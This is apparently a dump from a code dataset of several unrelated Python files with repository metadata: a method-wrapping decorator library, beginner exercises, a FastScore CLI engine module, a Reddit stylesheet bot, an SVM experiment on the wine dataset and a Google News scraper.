    ``call_wrapped_manually=True`` to invoke the parent yourself. When the
    wrapped callable is a plain function rather than a method, pass
    ``wrapped_is_method=False`` so the wrapper's first argument (``self``)
    is not forwarded to it.
    """
    options = dict(
        call_wrapped_first=call_wrapped_first,
        call_wrapped_manually=call_wrapped_manually,
        wrapped_is_method=wrapped_is_method,
        concat_docs=concat_docs,
    )

    def decorator(wrapper_method):
        return SubclassMutatorMethod(wrapper_method, wrapped_method_or_class, **options)

    return decorator
# Alias kept so callers can decorate __init__ with a more specific name.
subclass_init = subclass_mutator_method
def subclass_method(
    wrapped_method_or_class, pass_to_wrapper_as, wrapped_is_method=True
):
    """Decorator factory: call the superclass method first and feed its
    result(s) into the decorated method via the keyword parameter(s) named
    in *pass_to_wrapper_as* (a str, or a tuple of str for multiple values).
    """
    def decorator(wrapper_method):
        return SubclassMethod(
            wrapper_method,
            wrapped_method_or_class,
            wrapped_is_method=wrapped_is_method,
            pass_to_wrapper_as=pass_to_wrapper_as,
        )

    return decorator
class _SubclassMethodBase:
    """Shared plumbing for SubclassMutatorMethod/SubclassMethod: pairs a
    subclass override (*wrapper*) with the superclass callable (*wrapped*),
    validates that their signatures are compatible, and knows how to slice
    a wrapper call's arguments down to those the wrapped callable accepts.
    Instances are non-data descriptors so they bind like normal methods."""

    # Parameter-name bookkeeping, filled in by __init__:
    # new_* are the wrapper's names, old_* the wrapped callable's
    # (pos = positional, varpos = *args, kw = keyword, varkw = **kwargs).
    new_pos = None
    old_pos = None
    new_varpos = None
    old_varpos = None
    new_kw = None
    old_kw = None
    new_varkw = None
    old_varkw = None
    wrapped = None
    wrapper = None
    wrapped_sig = None
    wrapper_sig = None
    wrapped_is_method = None
    __signature__ = None

    def __init__(
        self, wrapper, wrapped_method_or_class, *, wrapped_is_method, concat_docs=True
    ):
        """Resolve the wrapped callable, capture both signatures, validate
        the override, and copy function metadata onto this instance."""
        self.wrapped = get_wrapped_method(wrapper, wrapped_method_or_class)
        self.wrapped_sig = signature(self.wrapped)
        self.wrapper = wrapper
        self.wrapper_sig = signature(wrapper)
        self.wrapped_is_method = bool(wrapped_is_method)
        # validate_overrides returns the categorized parameter names for
        # both callables (and raises if the override is incompatible).
        wrapper_names, wrapped_names = validate_overrides(
            wrapper=self.wrapper_sig,
            wrapped=self.wrapped_sig,
            wrapper_is_method=True,
            wrapped_is_method=wrapped_is_method,
        )
        self.new_pos, self.new_varpos, self.new_kw, self.new_varkw = wrapper_names
        self.old_pos, self.old_varpos, self.old_kw, self.old_varkw = wrapped_names
        wrapped, wrapper = self.wrapped, self.wrapper
        # Make this object look like the wrapper function (name, module,
        # annotations...); updated=() so __dict__ is not merged.
        update_wrapper(
            self,
            wrapper,
            assigned=(
                "__name__",
                "__qualname__",
                "__module__",
                "__annotations__",
                "__kwdefaults__",
            ),
            updated=(),
        )
        # Concatenate wrapped + wrapper docstrings when either exists.
        if concat_docs and (wrapped.__doc__ is not None or wrapper.__doc__ is not None):
            self.__doc__ = "\n".join(f.__doc__ for f in (wrapped, wrapper) if f.__doc__)

    def get_wrapped_args_kwargs(self, args, kwargs):
        """Given the (args, kwargs) of a wrapper call, return the subset
        (wrapped_args, wrapped_kwargs) to forward to the wrapped callable."""
        bound = bind_verbosely(
            self.wrapper_sig, args, kwargs, name=self.wrapper.__qualname__
        )
        allargs = bound.arguments
        new_varpos, new_varkw = (self.new_varpos, self.new_varkw)
        varargnames = new_varpos, new_varkw
        # Forward `self` (args[0]) only when the wrapped callable is a method.
        wrapped_args = [args[0]] if self.wrapped_is_method else []
        # Positional args of the wrapped callable that were supplied to the
        # wrapper (excluding the variadic collector names themselves).
        wrapped_args.extend(
            allargs[k] for k in self.old_pos if k in allargs and k not in varargnames
        )
        if new_varpos:
            wrapped_args.extend(allargs[new_varpos])
        wrapped_kwargs = dict(
            (k, allargs[k])
            for k in self.old_kw
            if k in allargs and k not in varargnames
        )
        if new_varkw is not None:
            wrapped_kwargs.update(allargs[new_varkw])
        # this will throw a nice error if anything is missing
        _ = bind_verbosely(
            self.wrapped_sig,
            tuple(wrapped_args),
            wrapped_kwargs,
            name=self.wrapped.__qualname__,
        )
        return wrapped_args, wrapped_kwargs

    def __get__(self, obj, cls):
        # Descriptor protocol: bind to the instance like a plain function
        # would, so the composite behaves as a normal method.
        if obj is not None:
            return MethodType(self, obj)
        return self

    def __call__(self, *args, **kwargs):
        # Abstract: concrete call semantics live in the subclasses.
        pass
class SubclassMutatorMethod(_SubclassMethodBase):
    """Composite method that (by default) calls the wrapped superclass
    method with the arguments it accepts, then the wrapper with all
    arguments; ordering and manual control are configurable. The wrapper's
    return value (or the wrapped's, depending on order) is returned."""

    call_wrapped_manually = None

    def __init__(
        self,
        wrapper,
        wrapped_method_or_class,
        *,
        wrapped_is_method=True,
        call_wrapped_first=True,
        call_wrapped_manually=False,
        concat_docs=True
    ):
        super().__init__(
            wrapper,
            wrapped_method_or_class,
            wrapped_is_method=wrapped_is_method,
            concat_docs=concat_docs,
        )
        # Expose the union of both signatures to introspection tools.
        self.__signature__ = merged_signature(
            self.wrapper_sig,
            self.wrapped_sig,
            wrapper_is_method=True,
            wrapped_is_method=wrapped_is_method,
            return_arg_names=False,
        )
        self.call_wrapped_first = bool(call_wrapped_first)
        self.call_wrapped_manually = bool(call_wrapped_manually)

    def __call__(self, *args, **kwargs):
        """Dispatch to wrapped/wrapper per the configured calling policy."""
        wrapped_args, wrapped_kwargs = self.get_wrapped_args_kwargs(args, kwargs)
        if not self.call_wrapped_manually:
            if self.call_wrapped_first:
                self.wrapped(*wrapped_args, **wrapped_kwargs)
                return self.wrapper(*args, **kwargs)
            else:
                self.wrapper(*args, **kwargs)
                return self.wrapped(*wrapped_args, **wrapped_kwargs)
        else:
            # Caller invokes the wrapped method inside the wrapper body.
            return self.wrapper(*args, **kwargs)
class SubclassMethod(_SubclassMethodBase):
    """Composite method that calls the wrapped superclass method first and
    injects its result into the wrapper call as the keyword argument(s)
    named by *pass_to_wrapper_as* (a str, or tuple of str to unpack a
    multi-valued result)."""

    pass_to_wrapper_as = None
    pass_to_wrapper_kind = None
    pass_multiple_args = None

    def __init__(
        self,
        wrapper,
        wrapped_method_or_class,
        *,
        wrapped_is_method=True,
        pass_to_wrapper_as=None
    ):
        # Validate the target-parameter spec before doing any other work.
        if not isinstance(pass_to_wrapper_as, str):
            if not isinstance(pass_to_wrapper_as, tuple) or not all(
                isinstance(n, str) for n in pass_to_wrapper_as
            ):
                raise TypeError(
                    "`pass_to_wrapper_as` must be str or a tuple of str; got {}".format(
                        repr(pass_to_wrapper_as)
                    )
                )
        super().__init__(
            wrapper, wrapped_method_or_class, wrapped_is_method=wrapped_is_method
        )
        pass_multiple = isinstance(pass_to_wrapper_as, tuple)
        self.pass_multiple_args = pass_multiple
        self.pass_to_wrapper_as = pass_to_wrapper_as
        # Look up the kind (positional-or-keyword / keyword-only / ...) of
        # each receiving parameter on the wrapper's signature.
        pass_to_wrapper_kind = (
            tuple(self.wrapper_sig.parameters[k].kind for k in pass_to_wrapper_as)
            if pass_multiple
            else self.wrapper_sig.parameters[pass_to_wrapper_as].kind
        )
        self.pass_to_wrapper_kind = pass_to_wrapper_kind
        kinds = pass_to_wrapper_kind if pass_multiple else (pass_to_wrapper_kind,)
        # Only parameters that can be passed by keyword may receive the
        # wrapped result (it is injected via kwargs in __call__).
        if not all(
            k in (Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY)
            for k in kinds
        ):
            raise TypeError(
                "wrapped result is specified to be passed to {}, which is of kind {}; only parameter kinds "
                "{} are allowed here".format(
                    pass_to_wrapper_as,
                    repr(pass_to_wrapper_kind),
                    (Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY),
                )
            )
        pass_names = pass_to_wrapper_as if pass_multiple else (pass_to_wrapper_as,)
        # The public signature omits the injected parameter(s): callers
        # never supply them directly.
        wrapper_call_sig = Signature(
            p for p in self.wrapper_sig.parameters.values() if p.name not in pass_names
        )
        self.__signature__ = merged_signature(
            wrapper_call_sig,
            self.wrapped_sig,
            wrapper_is_method=True,
            wrapped_is_method=wrapped_is_method,
            return_arg_names=False,
        )

    def __call__(self, *args, **kwargs):
        """Call wrapped first, then the wrapper with the result injected."""
        wrapped_args, wrapped_kwargs = self.get_wrapped_args_kwargs(args, kwargs)
        result = self.wrapped(*wrapped_args, **wrapped_kwargs)
        result_arg = self.pass_to_wrapper_as
        if not self.pass_multiple_args:
            kwargs[result_arg] = result
        else:
            # Multi-valued: unpack the result across the named parameters.
            kwargs.update(zip(result_arg, result))
        return self.wrapper(*args, **kwargs)
def get_wrapped_method(wrapper, wrapped_method_or_class):
    """Resolve the wrapped callable.

    When a class is supplied, look up the method on it that shares the
    wrapper's name; otherwise the argument already is the callable.
    """
    if not isinstance(wrapped_method_or_class, type):
        return wrapped_method_or_class
    # Resolve the like-named method on the parent class.
    return getattr(wrapped_method_or_class, wrapper.__name__)
| true |
5a9a8f5fd9845d346566bf5d8ce0735ccaeac327 | Python | ItsMrTurtle/PythonChris | /Unit 4 For Loops/Lesson18.3-Break_Statements.py | UTF-8 | 379 | 3.375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 23:20:43 2020
@author: Christopher Cheng
"""
# Simple password prompt: the user gets maxTries attempts in total.
guess = input("Enter the password: ")
code = "turtle"
trial = 1
maxTries = 3
while guess != code:
    if trial >= maxTries:
        break
    trial +=1
    guess = input("Enter again: ")
# NOTE(review): a correct guess on the final attempt still lands in the
# "Took too long..." branch, because trial == maxTries by then.
if (trial >= maxTries):
    print("Took too long...")
else:
    print("Nice, you got it")
| true |
73e60adf797b7db06ef152b8ba911e1126e80e76 | Python | baur100/python1 | /lesson14/main.py | UTF-8 | 458 | 2.75 | 3 | [] | no_license | from lesson14.pc import Pc
from lesson14.tree import Tree
from lesson14.cat import Cat
from lesson14.dog import Dog
# Demo of the lesson-14 classes: construct one of each and exercise fields.
pc = Pc(16,'i7',1000,'samsung')
print(f"{pc.memory}, {pc.cpu}, {pc.monitor}, {pc.ssd}")
maple = Tree(20,"maple",50)
maple.print_tree()
fir_tree = Tree(10, "fir", 5)
# Attributes can be added to instances dynamically in Python.
fir_tree.isPine=True
barsik = Cat("Barsik",3)
print(barsik)
# dunder __method_name__
# private _private_method_or_field
# mangling __field_name
doggy = Dog("sharik",50)
| true |
a75f14e3899cba9e2973ea95c0ea28877fc73c62 | Python | modelop/fastscore-cli | /cli/engine.py | UTF-8 | 1,957 | 2.78125 | 3 | [
"Apache-2.0"
] | permissive |
import json
from .colors import tcol
def pause(connect, verbose=False, **kwargs):
    """Pause the engine resolved via *connect* (Python 2 CLI command)."""
    engine = connect.lookup('engine')
    engine.pause()
    if verbose:
        print "Engine '%s' paused" % engine.name
def unpause(connect, verbose=False, **kwargs):
    """Resume a paused engine resolved via *connect*."""
    engine = connect.lookup('engine')
    engine.unpause()
    if verbose:
        print "Engine '%s' unpaused" % engine.name
def inspect(connect, verbose=False, asjson=False, **kwargs):
    """Print the engine state: as JSON (asjson), as prose with an
    explanation (verbose), or as the bare state name otherwise."""
    engine = connect.lookup('engine')
    if asjson:
        doc = {'state': engine.state}
        print json.dumps(doc, indent=2)
    else:
        state = engine.state
        if verbose:
            print "The current engine state is %s." % state
            print
            print explain_state(state)
        elif state == "RUNNING":
            # RUNNING is highlighted green; all other states print plainly.
            print tcol.OKGREEN + state + tcol.ENDC
        else:
            print state
def reset(connect, verbose=False, **kwargs):
    """Reset the engine resolved via *connect*."""
    engine = connect.lookup('engine')
    engine.reset()
    if verbose:
        print "Engine '%s' reset" % engine.name
def explain_state(state):
    """Return a human-readable description of an engine *state*.

    Unknown states yield None, matching the original if/elif chain.
    """
    descriptions = {
        "INIT": "The engine waits until all required streams are attached and the model is loaded.",
        "RUNNING": "The engine is reading data from input streams, passing them to model instances,\n"
                   "collecting outputs from the model, and writing them to output streams.",
        "PAUSED": "No data processing is taking place.",
        "PIGGING": "The engine follows a PIG control record though the data pipeline. Typically, the\n"
                   "state is short-lived.",
        "FINISHING": "All input stream reached EOF but data processing by model instances\n"
                     "continues.",
        "FINISHED": "The data processing is complete. All streams are at EOF. All model instances are\n"
                    "idle. Reset the engine to load another model.",
    }
    return descriptions.get(state)
| true |
2629ce7271aac14e6e8b5771b034ee2eb2f39416 | Python | Yaeger42/PlatziChallenges | /cuartoNivel/Challenge7.py | UTF-8 | 1,641 | 4.25 | 4 | [] | no_license | from math import pi, sqrt
def triangleArea(base, height):
    """Return the area of a triangle from its base and height."""
    half_product = (base * height) / 2
    return half_product
def squareArea(side):
    """Return the area of a square with the given side length."""
    area = side**2
    return area
def pentagonArea(p, a):
    """Return the area of a regular pentagon from perimeter *p* and apothem *a*."""
    area = (p * a)/2
    return area
def rectangleArea(base, height):
    """Return the area of a rectangle from its base and height."""
    area = base * height
    return area
def circleArea(radius):
    """Return the area of a circle with the given radius."""
    area = pi * (radius**2)
    return area
def menu():
    """Interactive area-calculator menu.

    Bug fix: after a valid option was handled, the original never asked for
    a new option, so the loop recomputed the same shape forever. Now the
    option is re-prompted after every computation; entering a number above
    5 exits (the loop's original `option <= 5` contract).
    """
    print("1. Calculate the area of a triangle")
    print("2. Calculate the area of a square")
    print("3. Calculate the area of a pentagon")
    print("4. Calculate the area of a rectangle")
    print("5. Calculate the area of a circle")
    option = int(input("Enter an option with the desired number: "))
    while option <= 5:
        if option == 1:
            base = int(input("Enter the base of the triangle: "))
            height = int(input("Enter the height of the triangle: "))
            print(triangleArea(base, height))
        elif option == 2:
            side = int(input("Enter one size of the square: "))
            print(squareArea(side))
        elif option == 3:
            p = float(input("Enter the pentagon's perimeter: "))
            a = float(input("Enter the pentagon's apothem: "))
            print(pentagonArea(p, a))
        elif option == 4:
            b = int(input("Enter the base of the rectangle: "))
            height = int(input("Enter the height of the rectangle: "))
            print(rectangleArea(b, height))
        elif option == 5:
            r = int(input("Enter the radius of the circle: "))
            print(circleArea(r))
        else:
            # Out-of-range low values (<= 0) re-prompt without computing.
            option = int(input("Enter a valid option: "))
            continue
        # Ask for the next action; > 5 ends the session.
        option = int(input("Enter an option with the desired number: "))
def main():
    """Entry point: run the interactive menu."""
    menu()
# Script entry point.
if __name__ == '__main__':
    main()
| true |
6ac4b9d293115d76b749f5bc23ac00f50dc02ba3 | Python | LonMcGregor/LonMBot | /cssbot.py | UTF-8 | 3,932 | 2.609375 | 3 | [] | no_license | import praw
import json
import fileinput
import html
import string
# Static configuration.
READ_LIMIT = 5              # max modmail messages fetched / log entries kept
LOG_LOC = 'readmessages'    # file holding already-handled message ids
UPS_LOC = 'up'              # file with username (line 1) and password (line 2)
SUBREDDIT = 'MonarchyOfEquestria'
TRIGGER = 'MakeName'        # modmail subject that requests a name change
# Mutable module-level state.
r = praw.Reddit(user_agent = "praw:lonmcgregor.cssmanager:v1;(by /u/LonMcGregor)")
currentlog = []             # in-memory copy of the handled-message log
style = ""                  # working copy of the subreddit stylesheet
needsUpdating = 0           # set to 1 when `style` has pending changes
#log me in function
def login():
    """Read the username (line 1) and password (line 2) from UPS_LOC and
    log in to reddit.

    NOTE: the `ups` list has exactly two slots, so a credentials file with
    more than two lines raises IndexError.
    """
    pos = 0;
    ups = ["", ""]
    with fileinput.input(files=(UPS_LOC)) as f:
        for line in f:
            word = line.rstrip('\n')
            ups[pos] = word
            pos = pos + 1
    print("Logging in...")
    r.login(ups[0], ups[1])
    print("Logged in.")
#clear the log to just last READ_LIMIT entries
def cleanLog():
    """Rewrite the log file, always dropping its first (oldest) line and
    keeping at most READ_LIMIT of the remaining entries, then refresh
    `currentlog` via readLog()."""
    print("Cleaning Log")
    with fileinput.input(files=(LOG_LOC)) as log_file:
        all_lines = list(log_file)
    # Same selection as the original counter loop: lines 2..READ_LIMIT+1.
    kept = all_lines[1:READ_LIMIT + 1]
    with open(LOG_LOC, 'w') as out:
        out.write(''.join(kept))
    readLog()
#read the log into list
def readLog():
    """Re-read the log file into the module-level `currentlog` list,
    stripping trailing newlines from each entry."""
    global currentlog
    print("Reading log")
    currentlog = []
    with fileinput.input(files=(LOG_LOC)) as log_file:
        currentlog = [entry.rstrip('\n') for entry in log_file]
#write a new entry to the log
def writeToLog(log):
    """Append *log* (a message id) to the log file, trimming the file
    first so it never grows past READ_LIMIT entries, then refresh the
    in-memory copy."""
    print("Logging... "+ log)
    cleanLog()
    with open(LOG_LOC, 'a') as log_file:
        log_file.write(log + '\n')
    readLog()
#return the last READ_LIMIT mod mails
def getModMail():
    """Return the last READ_LIMIT mod-mail messages for SUBREDDIT."""
    print("Getting modmail")
    modreddit = r.get_subreddit(SUBREDDIT)
    return r.get_mod_mail(modreddit, limit=READ_LIMIT)
#return the SUBREDDIT's style
def getStyle():
    """Return SUBREDDIT's stylesheet with HTML entities unescaped."""
    print("Getting stylesheet")
    return html.unescape(r.get_stylesheet(SUBREDDIT)['stylesheet'])
#helper function: does an iterable contain an item
def contains(list, item):
try:
list.index(item)
return True
except ValueError:
return False
#check a message and act upon if necessary
def handleMsg(message):
messageid = message.id
print("Handling message "+messageid)
if(not contains(currentlog, messageid)):
if(message.subject == TRIGGER):
if(isValidName(message.body)):
appendToStyle(message.author.id, message.body)
message.reply("Done!")
else:
message.reply("Please send a new message with a valid name. [contains a-z, A-Z, 0-9 and spaces only, less than 30 characters long]")
writeToLog(messageid)
else:
print("Message previously handled")
#check if a new name is valid
def isValidName(name):
    """Return True when `name` is an acceptable display name.

    A name is valid when, after lower-casing, it is at most 30 characters
    long and contains only ASCII letters, digits and spaces.  The empty
    string is accepted, matching the original behaviour.

    Replaces a four-level nested-if character loop with an `all()`
    membership test — same results, no behaviour change.
    """
    name = name.lower()
    if len(name) > 30:
        return False
    allowed = string.ascii_letters + string.digits + " "
    return all(ch in allowed for ch in name)
#add a new name to the style
def appendToStyle(userid, username):
    """Queue two CSS rules for `userid`: one showing `username` via a
    :before content rule, one hiding the original link text.  Marks the
    stylesheet as needing upload."""
    global style
    global needsUpdating
    print("Prepping style append for: " + userid + " to " + username)
    content_rule = '\n .id-t2_' + userid + ':before { content: "' + username + '"; }\n'
    hide_rule = ' .id-t2_' + userid + ':link {color: rgba(0,0,0,0); font-size: 0px; }\n'
    style = style + content_rule + hide_rule
    needsUpdating = 1
#run the bot
def run():
    """One full pass: fetch the stylesheet and modmail, handle every
    message, and upload the stylesheet only if something changed."""
    global style
    global mail
    style = getStyle()
    mail = getModMail()
    print("Checking modmail")
    for message in mail:
        handleMsg(message)
    # appendToStyle() flips needsUpdating to 1 when a rule was queued
    if needsUpdating == 1:
        print("Style updating... ")
        r.set_stylesheet(SUBREDDIT, style)
    readLog()
# Script body: authenticate with Reddit before the processing pass below.
login()
run() | true |
cbadebee3d837955392845d48e180899dfa42e99 | Python | LucaBarco/Course-01SQIOV-Machine-Learning-And-Artificial-Intelligence | /HW1/venv/Ex04.py | UTF-8 | 2,623 | 2.6875 | 3 | [] | no_license |
from itertools import product
from sklearn.datasets import load_wine
import matplotlib.pyplot as plt
import numpy as np
from sklearn.svm import SVC
from matplotlib.colors import ListedColormap
from sklearn import neighbors, datasets,utils
from sklearn.model_selection import cross_val_score
n_neighbors=1
#load data
data = load_wine()
print(data.feature_names)
#select 2 features
dataSelection=data.data[:,[0,1]]
#print(dataSelection)
size=dataSelection.shape[0]
#split data
dataSelection,validation=utils.shuffle(dataSelection,data.target,random_state=10)
nTraining=int(size*0.5);
nTest=int(size*0.3);
nValidation=int(size*0.2);
#print("T{} T{} V{}".format(nTraining,nTest,nValidation))
trainingData=dataSelection[:nTraining]
testData=dataSelection[nTraining:nTraining+nTest]
validationData=dataSelection[nTraining+nTest:]
targetValues=validation[:nTraining]
np.append(trainingData,validationData)
np.append(targetValues,validation[nTraining:nTraining+nTest])
X=trainingData
y=targetValues
# Plotting decision regions
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, 0.1),
np.arange(y_min, y_max, 0.1))
for i in range (1,3):
f, axarr = plt.subplots(4, 4, sharex='col', sharey='row', figsize=(10, 8))
for idx,par in zip(product([0,1,2,3], [0,1,2,3]),product([0.001*(10**((i-1)*4)),0.01*(10**((i-1)*4)),0.1*(10**((i-1)*4)),1*(10**((i-1)*4))],[0.001*(10**((i-1)*4)),0.01*(10**((i-1)*4)),0.1*(10**((i-1)*4)),1*(10**((i-1)*4))])) :
clf = SVC(C=par[0], kernel='linear', gamma=par[1], probability=True)
clf.fit(trainingData, validation[:nTraining])
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
axarr[idx[0], idx[1]].contourf(xx, yy, Z, alpha=0.4)
axarr[idx[0], idx[1]].scatter(X[:, 0], X[:, 1], c=y,
s=20, edgecolor='k')
axarr[idx[0], idx[1]].set_title("Kernel SVM C={} Gamma={}".format(par[0],par[1]))
Z_V = clf.predict(validationData)
countV = 0
for i in range(0, Z_V.size):
# print ("Z:{} T:{}".format(Z_V[i], validation[i + nTraining + nTest]))
if (Z_V[i] == validation[i + nTraining + nTest]):
countV = countV + 1
accuracy = countV / nValidation
print("Accuracy of model ", "Kernel SVM C={} Gamma={}".format(par[0],par[1]), " : ", accuracy)
scores = cross_val_score(clf, X, y, cv=5)
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
plt.show()
| true |
b26a12378141d0107189b2d173f1bd499fdf2b97 | Python | RealJames/python-random-quote | /googlenews.py | UTF-8 | 1,469 | 2.609375 | 3 | [] | no_license | import requests
from bs4 import BeautifulSoup
from urllib.parse import quote
import urllib.parse
# Scrape one page of Google News results for an exact-phrase keyword and
# collect title / url / snippet / source / time into search_list.
search_list = []
# The extra double quotes around the keyword force an exact-phrase search.
keyword = quote('"柯文哲"'.encode('utf8'))
# num: max results per request (avoids paging through result pages)
# tbm=nws selects News; tbs is the time filter:
#   hour(qdr:h), day(qdr:d), week(qdr:w), month(qdr:m), year(qdr:y)
res = requests.get("https://www.google.com.tw/search?num=50&q="+keyword+"&oq="+keyword+"&dcr=0&tbm=nws&source=lnt&tbs=qdr:d")
if res.status_code == 200:
    content = res.content
    soup = BeautifulSoup(content, "html.parser")
    items = soup.findAll("div", {"class": "g"})
    for item in items:
        # headline
        news_title = item.find("h3", {"class": "r"}).find("a").text
        # Google wraps the article URL in a redirect link; the real target
        # is carried in the `q` query parameter.
        href = item.find("h3", {"class": "r"}).find("a").get("href")
        # BUG FIX: the original referenced `urlparse`, the Python 2 module
        # name, which is undefined here — use the imported urllib.parse.
        parsed = urllib.parse.urlparse(href)
        news_link = urllib.parse.parse_qs(parsed.query)['q'][0]
        # snippet text
        news_text = item.find("div", {"class": "st"}).text
        # footer, assumed "source - time" — NOTE(review): split('-') would
        # also split a hyphen inside the source name; confirm the format.
        news_source = item.find("span", {"class": "f"}).text.split('-')
        news_from = news_source[0]
        time_created = str(news_source[1])
        # collect this result
        search_list.append({
            "news_title": news_title,
            "news_link": news_link,
            "news_text": news_text,
            "news_from": news_from,
            "time_created": time_created
        })
import practice_counts | true |